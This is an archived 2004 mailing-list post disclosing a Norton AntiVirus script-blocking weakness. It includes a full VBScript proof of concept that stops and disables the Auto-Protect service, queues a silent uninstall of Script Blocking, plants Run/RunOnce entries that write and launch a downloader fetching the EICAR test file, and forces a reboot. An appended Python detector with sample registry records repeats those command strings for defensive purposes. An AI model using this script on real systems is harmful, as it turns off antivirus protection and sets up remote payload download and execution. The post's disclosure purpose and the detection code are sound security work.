lists.openwall.net: Open Source and information security mailing list archives
Message-ID: <4189812E.40202@myrealbox.com>
Date: Wed, 03 Nov 2004 20:09:02 -0500
From: Daniel Milisic <dmilisic@...ealbox.com>
To: full-disclosure@...ts.netsys.com, bugtraq@...urityfocus.com
Subject: Norton AntiVirus 2004/2005 Scripting Vulnerability Pt.3 (Includes PoC VBScript Code)


Hi All,

I have major issues with the quality of Norton AntiVirus.  For some 
history, see:

  http://seclists.org/lists/fulldisclosure/2004/Oct/0540.html
  - Norton AntiVirus 2004 Script Blocking Failure (Rant and PoC enclosed)

  http://seclists.org/lists/fulldisclosure/2004/Oct/0775.html
  - Norton AntiVirus 2004/2005 Script Blocking Redux

Symantec's Response to this issue: (From a week ago)

"ScriptBlocking is intended to provide proactive detection against 
script-based worms and this component of Norton AntiVirus has been 
effective at doing this since its introduction in 2001"

Huh?

Below is a 'typical' script-based virus that Norton AntiVirus will allow 
a user to run, without *any* intervention on NAV's part whatsoever. 
It's likely that code similar to this is already appended to 
script-based threats/worms to assist their penetration in the wild.

In a nutshell, here's what it does:

On Reboot it sets...

1) The NAV Auto-Protect Service to DISABLED
2) A registry key to Uninstall Script Blocking
3) Creates, launches a VBScript file to d/l the EICAR AV 'test' virus
4) Launches the EICAR.COM test pattern a few seconds later

....Then Reboots your computer.

The following code was tested under WinXP and a fully LiveUpdated NAV 
2005 using a broadband Internet connection.  Should be fine for Win2000 
and NAV 2004 as well.

--------------//// BEGIN DISABLE_NAV.VBS ////-----------------

' ----- DISABLE NORTON AUTO-PROTECT SERVICE WITH WMI -----

' Connect to WMI on the local machine (default namespace, root\cimv2).
Set oWMI = GetObject("winmgmts://.")

' Find the Auto-Protect service by display name, stop it, and set its
' start type to Disabled so it stays down after the reboot at the end.
sServiceName = "Norton AntiVirus Auto-Protect Service"
sWQL = "Select state from Win32_Service " _
     & "Where displayname='" & sServiceName & "'"
Set oResults = oWMI.ExecQuery(sWQL)
For Each oService In oResults
    oService.StopService
    oService.ChangeStartMode("Disabled")
Next

' -------- UNINSTALL SCRIPT BLOCKING WITH WMI ;) ----------

Const HKEY_LOCAL_MACHINE = &H80000002

' One StdRegProv instance serves every registry write below.
Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")

' RunOnce: at the next logon, silently uninstall the Script Blocking MSI package.
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Uninstall Norton Script Blocking"
strValue = "MSIEXEC /x {D327AFC9-7BAA-473A-8319-6EB7A0D40138} /Q"
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, strValue

' -------- CREATE VBS FILE TO GRAB THE EICAR AV-REFERENCE FILE ---------

' RunOnce: at the next logon, have cmd's ECHO write a one-line VBScript
' (estart.VBS) that fetches the EICAR test file with Microsoft.XMLHTTP and
' saves the response body to eicar.com through an ADODB.Stream.
q = Chr(34)
strValueName = "Create Code Downloader"
strValue = "cmd /c ECHO Set X=CreateObject(" & q & "Microsoft.XMLHTTP" & q & "):" _
         & "X.open " & q & "GET" & q & ",(" & q & "http://www.eicar.org/download/eicar.com" & q & "),False:" _
         & "X.send:set Y=createobject(" & q & "adodb.stream" & q & "):Y.type=1:Y.open:" _
         & "Y.write X.responseBody:Y.savetofile(" & q & "eicar.com" & q & "),2:Y.close > estart.VBS"
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, strValue

' -------- CREATE VBS FILE THAT TRIGGERS CODE LAUNCH ----------

' RunOnce: write elaunch.vbs, which sleeps ten seconds (to let the download
' finish) and then runs the fetched eicar.com in a cmd window.
strValueName = "Create Code Launcher"
strValue = "cmd /c ECHO wscript.sleep(10000):Set Z=CreateObject(" & q & "WSCript.Shell" & q & "):" _
         & "Z.run(" & q & "cmd /k eicar.com" & q & ") > elaunch.vbs"
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, strValue

' -------- LAUNCH EICAR DOWNLOADER ----------

' Run (not RunOnce): start the generated downloader at every logon. The
' RunOnce entries above have already created the file by the time Run is
' processed.
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Code DownLoader"
strValue = "estart.vbs"
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, strValue

' --------  RUN THE 'VIRUS' ----------

' Run: start the generated launcher at every logon as well.
strValueName = "Execute Malicious Code Launcher"
strValue = "elaunch.vbs"
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, strValue

' ---- USE WMI TO FORCE A REBOOT -- NEXT LOGIN, PWN3D ----

' Ask for the Shutdown privilege on the WMI connection, then call
' Win32Shutdown with flags 2 (reboot) + 4 (force applications to close).
Set wmi = GetObject("winmgmts:{(Shutdown)}")
Set objset = wmi.InstancesOf("Win32_OperatingSystem")
For Each obj In objset
    Set os = obj : Exit For
Next
os.Win32Shutdown 2 + 4

--------------//// END DISABLE_NAV.VBS ////-----------------

Best Regards,
Daniel Milisic

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
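The script above leaves a small, fixed set of traces in the registry: a protected service's start type flipped to Disabled, a silent msiexec uninstall queued under RunOnce, two ECHO-based file droppers under RunOnce, two Run values that point at script files, and the XMLHTTP/ADODB.Stream download pair inside one of them. The following is an added example, not code from the original post or from Symantec, showing how a defender could flag those moves in registry value-set records. The record format is a constructed simplification of a Sysmon Event ID 13 (value set) export, the sample lines and the PROTECTED_SERVICES set are assumptions made for the example, and the rules key on the target path and value data rather than on the writing process, because writes made through WMI's StdRegProv are performed by the WMI provider host, not by the script that requested them.

```python
"""Added example (not from the original post): flag the autorun and
service-tampering patterns the PoC relies on in registry value-set records.
The record format is a constructed simplification of a Sysmon Event ID 13
export and every sample line is made up for this example."""
import re
from dataclasses import dataclass

RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once|OnceEx)?\\", re.I)
SERVICE_START = re.compile(r"\\Services\\([^\\]+)\\Start$", re.I)
# Script files or script hosts named in autorun data.
SCRIPT_HOST = re.compile(
    r"\.(vbs|vbe|js|jse|wsf|wsh|hta)\b|\b[wc]script(\.exe)?\b|\bmshta(\.exe)?\b", re.I)
# 'cmd /c echo <payload> > <file>': an autorun entry that writes a file at logon.
ECHO_DROPPER = re.compile(r"\bcmd(\.exe)?\s+/[ck]\s+echo\b.*>\s*\S+", re.I)
# COM objects the PoC's generated downloader uses to fetch and save a file.
DOWNLOAD_COM = re.compile(r"XMLHTTP|WinHttp\.WinHttpRequest|ADODB\.Stream", re.I)
# Silent MSI uninstall (/x ... /q) scheduled from an autorun key.
SILENT_UNINSTALL = re.compile(r"\bmsiexec(\.exe)?\b.*\s/x\b.*\s/q", re.I)
DWORD_VALUE = re.compile(r"0x([0-9a-f]+)", re.I)
SERVICE_DISABLED = 4  # SCM start type written by ChangeStartMode("Disabled")

# Service names whose start type must never become Disabled. This set is an
# assumption for the example; fill it from the AV/EDR actually deployed.
PROTECTED_SERVICES = {"navapsvc", "ccevtmgr"}

# Constructed sample records; Image values are illustrative, not measured.
SAMPLE_RECORDS = r"""
EventID=13|Image=C:\WINDOWS\system32\services.exe|TargetObject=HKLM\System\CurrentControlSet\Services\navapsvc\Start|Details=DWORD (0x00000004)
EventID=13|Image=C:\WINDOWS\system32\wbem\wmiprvse.exe|TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Uninstall Norton Script Blocking|Details=MSIEXEC /x {D327AFC9-7BAA-473A-8319-6EB7A0D40138} /Q
EventID=13|Image=C:\WINDOWS\system32\wbem\wmiprvse.exe|TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Create Code Downloader|Details=cmd /c ECHO Set X=CreateObject("Microsoft.XMLHTTP"):X.open "GET",("http://www.eicar.org/download/eicar.com"),False:X.send:set Y=createobject("adodb.stream"):Y.type=1:Y.open:Y.write X.responseBody:Y.savetofile("eicar.com"),2:Y.close > estart.VBS
EventID=13|Image=C:\WINDOWS\system32\wbem\wmiprvse.exe|TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Create Code Launcher|Details=cmd /c ECHO wscript.sleep(10000):Set Z=CreateObject("WSCript.Shell"):Z.run("cmd /k eicar.com") > elaunch.vbs
EventID=13|Image=C:\WINDOWS\system32\wbem\wmiprvse.exe|TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Execute Code DownLoader|Details=estart.vbs
EventID=13|Image=C:\Program Files\ExampleApp\setup.exe|TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExampleApp Tray|Details=C:\Program Files\ExampleApp\tray.exe
EventID=13|Image=C:\WINDOWS\system32\services.exe|TargetObject=HKLM\System\CurrentControlSet\Services\Spooler\Start|Details=DWORD (0x00000002)
"""


@dataclass(frozen=True)
class Finding:
    rule: str
    target: str
    image: str


def parse_record(line):
    """Split 'EventID=..|Image=..|TargetObject=..|Details=..' into a dict.
    Only the first three '|' separators are used, so a '|' inside Details
    (free-form value data) cannot break the record."""
    fields = {}
    for part in line.split("|", 3):
        key, _, value = part.partition("=")
        fields[key.strip()] = value
    return fields


def evaluate(rec):
    """Apply every rule to one parsed record; a record may hit several."""
    findings = []
    target = rec.get("TargetObject", "")
    details = rec.get("Details", "")
    image = rec.get("Image", "")
    if RUN_KEY.search(target):
        if SCRIPT_HOST.search(details):
            findings.append(Finding("autorun_script_host", target, image))
        if ECHO_DROPPER.search(details):
            findings.append(Finding("autorun_echo_dropper", target, image))
        if DOWNLOAD_COM.search(details):
            findings.append(Finding("autorun_download_com", target, image))
        if SILENT_UNINSTALL.search(details):
            findings.append(Finding("autorun_silent_msi_uninstall", target, image))
    m = SERVICE_START.search(target)
    if m and m.group(1).lower() in PROTECTED_SERVICES:
        dv = DWORD_VALUE.search(details)
        if dv and int(dv.group(1), 16) == SERVICE_DISABLED:
            findings.append(Finding("protected_service_disabled", target, image))
    return findings


def scan(text):
    """Run the rules over a block of records, skipping blank and non-13 lines."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_record(line)
        if rec.get("EventID") != "13":
            continue
        findings.extend(evaluate(rec))
    return findings


def rules_by_target(text):
    """Report view: {last path component of the target: sorted rule names}."""
    out = {}
    for f in scan(text):
        out.setdefault(f.target.rsplit("\\", 1)[-1], set()).add(f.rule)
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for f in scan(SAMPLE_RECORDS):
        print(f"{f.rule:30} {f.target}")
```

Run stand-alone, the block prints one line per rule hit for the five malicious sample records and nothing for the two benign ones. The Image field is carried into each finding for the analyst but is not used in a rule, since a WMI-driven write will not show the script host that caused it.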
